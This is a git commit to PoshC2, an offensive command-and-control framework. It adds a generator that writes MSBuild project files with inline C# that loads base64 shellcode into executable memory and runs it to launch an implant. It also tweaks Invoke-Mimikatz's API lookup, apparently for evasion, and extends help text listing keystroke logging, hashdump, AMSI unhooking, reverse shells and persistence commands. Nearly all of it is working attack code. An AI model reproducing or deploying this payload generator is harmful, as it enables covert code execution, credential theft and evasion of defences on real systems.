'Added MSBuild Files to PoshC2'

2018-09-16 16:53:44 +01:00 · 2018-09-16 16:53:44 +01:00 · 80136574c4
parent 71e1c2f7cf
commit 80136574c4
6 changed files with 75 additions and 12 deletions
--- a/C2Server.py
+++ b/C2Server.py
@ -291,6 +291,7 @@ if __name__ == '__main__':
      newPayload.CreateCS()
      newPayload.CreateMacro()
      newPayload.CreateEXE()
+      newPayload.CreateMsbuild()

      create_self_signed_cert(ROOTDIR)
      newPayload.CreatePython()
--- a/Help.py
+++ b/Help.py
@ -77,9 +77,9 @@ get-wmiregmounteddrive
 resolve-ipaddress
 unhook-amsi
 get-process -id $pid -module |%{ if ($_.modulename -eq "amsi.dll") {echo "`nAMSI Loaded`n"} }
+get-wmiObject -class win32_product
 """

-
 posh_help2 = """
 Privilege Escalation:
 ====================
@ -172,7 +172,7 @@ brute-locadmin -username administrator
 get-passpol
 get-passnotexp
 get-locadm
-invoke-inveigh -http y -proxy y -nbns y -tool 1
+invoke-inveigh -http y -proxy y -nbns y -tool 1 -StartupChecks y
 get-inveigh | stop-inveigh (gets output from inveigh thread)
 invoke-sniffer -outputfile c:\\temp\\output.txt -maxsize 50mb -localip 10.10.10.10
 invoke-sqlquery -sqlserver 10.0.0.1 -user sa -pass sa -query 'select @@version'
@ -230,6 +230,7 @@ cred-popper
 get-clipboard
 hashdump
 get-keystrokes
+get-keystrokedata
 arpscan -ipcidr 10.0.0.1/24
 portscan -ipaddress 10.0.0.1-50 -ports "1-65535" -maxqueriesps 10000 -delay 0
 ((new-object Net.Sockets.TcpClient).connect("10.0.0.1",445))
@ -246,6 +247,7 @@ netsh advfirewall firewall add rule name="Open Port 80" dir=in action=allow prog
 $socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);$socket.start();
 reversedns 10.0.0.1
 powercat -c 172.0.0.1 -p 8080 -d
+[System.Net.Dns]::GetHostbyAddress("10.0.0.1")

 Implant Handler:
 =====================
@ -326,7 +328,7 @@ COMMANDS = ['loadmodule',"bloodhound","brute-ad","brute-locadmin",
 "install-servicelevel-persistence","remove-servicelevel-persistence","reversedns",
 "invoke-eternalblue","loadmoduleforce","unhook-amsi","get-implantworkingdirectory","get-system",
 "get-system-withproxy","get-system-withdaisy","get-pid","listmodules","modulesloaded",
-"startanotherimplant","remove-persistence","removeexe-persistence","installexe-persistence"]
+"startanotherimplant","remove-persistence","removeexe-persistence","installexe-persistence","resolve-ipaddress"]

 COMMANDS += ['invoke-psexecpayload','invoke-wmipayload', 'invoke-dcompayload']
 COMMANDS += ['invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomproxypayload']
--- a/Implant.py
+++ b/Implant.py
@ -532,7 +532,7 @@ while($true)
    it = self.Pivot
    if (it == "OSX"):
      it = "Python"
-    print "New %s implant connected: (uri=%s key=%s)" % (it, self.RandomURI, self.Key)
+    print "New %s implant connected: (uri=%s key=%s) (%s)" % (it, self.RandomURI, self.Key, now.strftime("%m/%d/%Y %H:%M:%S"))
    print "%s | URL:%s | Time:%s | PID:%s | Sleep:%s | %s (%s) " % (self.IPAddress, self.Proxy, self.FirstSeen, 
      self.PID, self.Sleep, self.Domain, self.Arch)
    print "",Colours.END
--- a/ImplantHandler.py
+++ b/ImplantHandler.py
@ -214,9 +214,12 @@ def startup(printhelp = ""):
        if i[3] not in hosts:
          hosts += "%s \n" % i[3]
      for t in comtasks:
-        if "Upload-File" in t[3]:
-          hostname = get_implantdetails(t[2])
-          uploads += "%s %s \n" % (hostname[3], t[3])   
+        hostname = get_implantdetails(t[2])
+        if "Upload-File" in t[3]:          
+          uploadedfile = t[3]
+          uploadedfile = uploadedfile.partition("estination ")[2]
+          uploadedfile = uploadedfile.partition(" -Base64")[0]
+          uploads += "%s %s \n" % (hostname[3], uploadedfile)   
        if "Installing" in t[4]:
          hostname = get_implantdetails(t[2])
          line = t[4].replace('\n','')
@ -275,7 +278,8 @@ def startup(printhelp = ""):
      newPayload.CreateRaw(name)
      newPayload.CreateDlls(name)
      newPayload.CreateShellcode(name) 
-      newPayload.CreateEXE(name)     
+      newPayload.CreateEXE(name) 
+      newPayload.CreateMsbuild(name)
      startup("Created new %s daisy payloads" % name)

    if "createproxypayload" in implant_id.lower():
@ -293,7 +297,8 @@ def startup(printhelp = ""):
      newPayload.CreateRaw("Proxy")
      newPayload.CreateDlls("Proxy")
      newPayload.CreateShellcode("Proxy")
-      newPayload.CreateEXE("Proxy")   
+      newPayload.CreateEXE("Proxy")
+      newPayload.CreateMsbuild("Proxy")
      startup("Created new proxy payloads")

    if "createnewpayload" in implant_id.lower():
@ -306,6 +311,7 @@ def startup(printhelp = ""):
      proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
      if proxyurl:
        imurl = "%s?p" % get_newimplanturl()
+        domainbase = "Proxy%s" % domainbase
      else:
        imurl = get_newimplanturl()
      C2 = get_c2server_all()
@ -317,6 +323,7 @@ def startup(printhelp = ""):
      newPayload.CreateDlls("%s_" % domainbase)
      newPayload.CreateShellcode("%s_" % domainbase)
      newPayload.CreateEXE("%s_" % domainbase)
+      newPayload.CreateMsbuild("%s_" % domainbase)
      startup("Created new payloads")

    if (implant_id == "?") or (implant_id == "help"):
@ -869,6 +876,7 @@ def runcommand(command, randomuri):
      newPayload.CreateDlls(name)
      newPayload.CreateShellcode(name)    
      newPayload.CreateEXE(name)   
+      newPayload.CreateMsbuild(name)
      startup("Created new %s daisy payloads" % name)

    elif "createproxypayload" in command.lower():
@ -886,7 +894,8 @@ def runcommand(command, randomuri):
      newPayload.CreateRaw("Proxy")
      newPayload.CreateDlls("Proxy")
      newPayload.CreateShellcode("Proxy")
-      newPayload.CreateEXE("Proxy")      
+      newPayload.CreateEXE("Proxy")
+      newPayload.CreateMsbuild("Proxy")
      startup("Created new proxy payloads")

    elif "createnewpayload" in command.lower():
@ -899,6 +908,7 @@ def runcommand(command, randomuri):
      proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
      if proxyurl:
        imurl = "%s?p" % get_newimplanturl()
+        domainbase = "Proxy%s" % domainbase
      else:
        imurl = get_newimplanturl()
      C2 = get_c2server_all()
@ -910,6 +920,7 @@ def runcommand(command, randomuri):
      newPayload.CreateDlls("%s_" % domainbase)
      newPayload.CreateShellcode("%s_" % domainbase)
      newPayload.CreateEXE("%s_" % domainbase)
+      newPayload.CreateMsbuild("%s_" % domainbase)
      startup("Created new payloads")
    else:
      if command:
--- a/Modules/Invoke-Mimikatz.ps1
+++ b/Modules/Invoke-Mimikatz.ps1
@ -883,7 +883,8 @@ $RemoteScriptBlock = {
 	    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
 	    # Get a reference to the GetModuleHandle and GetProcAddress methods
 	    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
-	    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
+	    #$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
+            $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [reflection.bindingflags] "Public,Static", $null, [System.Reflection.CallingConventions]::Any, @((New-Object System.Runtime.InteropServices.HandleRef).GetType(), [string]), $null);
 	    # Get a handle to the module specified
 	    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
 	    $tmpPtr = New-Object IntPtr
@ -2833,4 +2834,4 @@ param(
            }
        }
    }
-} 
+} 
--- a/Payloads.py
+++ b/Payloads.py
@ -483,3 +483,51 @@ End Sub
    output_file = open(filename, 'w')
    output_file.write(macro)
    output_file.close()
+
+  def CreateMsbuild(self, name=""):
+    x86filename = "%s%s" % (self.BaseDirectory,name+"Posh-shellcode_x86.bin")
+    x64filename = "%s%s" % (self.BaseDirectory,name+"Posh-shellcode_x64.bin")
+    with open(x86filename, "rb") as b86:
+      x86base64 = base64.b64encode(b86.read())
+    with open(x64filename, "rb") as b64:
+      x64base64 = base64.b64encode(b64.read())  
+    projname = randomuri()
+
+    msbuild="""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <Target Name="%s">
+ <%s />
+ </Target>
+ <UsingTask
+ TaskName="%s"
+ TaskFactory="CodeTaskFactory"
+ AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
+ <Task>
+ <Code Type="Class" Language="cs">
+ <![CDATA[
+using System;using System.Runtime.InteropServices;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;
+public class %s : Task, ITask
+{
+private static UInt32 MEM_COMMIT = 0x1000;private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
+[DllImport("kernel32")]private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
+[DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 lpThreadAttributes,UInt32 dwStackSize,UInt32 lpStartAddress,IntPtr param,UInt32 dwCreationFlags,ref UInt32 lpThreadId);
+[DllImport("kernel32")]private static extern UInt32 WaitForSingleObject(IntPtr hHandle,UInt32 dwMilliseconds);
+public override bool Execute()
+{
+string pw = "%s";
+string sc32 = "%s";
+string sc64 = "%s";
+byte[] sc = null;
+if (IntPtr.Size == 4){sc = System.Convert.FromBase64String(sc32);} else {sc = System.Convert.FromBase64String(sc64);}
+
+UInt32 funcAddr = VirtualAlloc(0, (UInt32)sc.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(sc, 0, (IntPtr)(funcAddr), sc.Length);IntPtr hThread = IntPtr.Zero;UInt32 threadId = 0;IntPtr pinfo = IntPtr.Zero;hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);WaitForSingleObject(hThread, 0xFFFFFFFF);return true;}}
+ ]]>
+ </Code>
+ </Task>
+ </UsingTask>
+ </Project>
+""" % (projname,projname,projname,projname,projname,x86base64,x64base64)
+    self.QuickstartLog( "Msbuild file written to: %s%smsbuild.xml" % (self.BaseDirectory,name) )
+    filename = "%s%smsbuild.xml" % (self.BaseDirectory,name)
+    output_file = open(filename, 'w')
+    output_file.write(msbuild)
+    output_file.close()